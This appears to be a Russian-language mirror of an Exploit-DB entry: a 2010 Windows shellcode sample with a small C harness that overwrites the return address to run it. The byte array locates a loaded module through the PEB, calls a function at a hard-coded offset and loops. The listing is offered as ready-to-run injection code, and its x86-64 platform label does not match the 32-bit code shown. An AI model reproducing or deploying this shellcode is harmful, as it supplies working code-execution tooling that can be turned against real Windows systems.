- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13719
- Проверка EDB
-
- Пройдено
- Автор
- AGIX
- Тип уязвимости
- SHELLCODE
- Платформа
- WINDOWS_X86-64
- CVE
- N/A
- Дата публикации
- 2010-05-28
C:
#include <stdio.h>
char shellcode[] =
"\x31\xC9" //xor ecx, ecx
"\x64\x8B\x71\x30" //mov esi, [fs:ecx+0x30]
"\x8B\x76\x0C" //mov esi, [esi+0x0C]
"\x8B\x76\x1C" //mov esi, [esi+0x1c]
"\x8B\x06" //mov eax, [esi]
"\x8B\x68\x08" //mov ebp, [eax+0x08]
"\x68\x11\x11\x11\x11" //push 0x11111111
"\x66\x68\x11\x11" //push word 0x1111
"\x5B" //pop ebx
"\x53" //push ebx
"\x55" //push ebp
"\x5B" //pop ebx
"\x66\x81\xC3\x4B\x85" //add bx, 0x854b
"\xFF\xD3" //call ebx
"\xEB\xEA"; //jmp short
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
- Источник
- www.exploit-db.com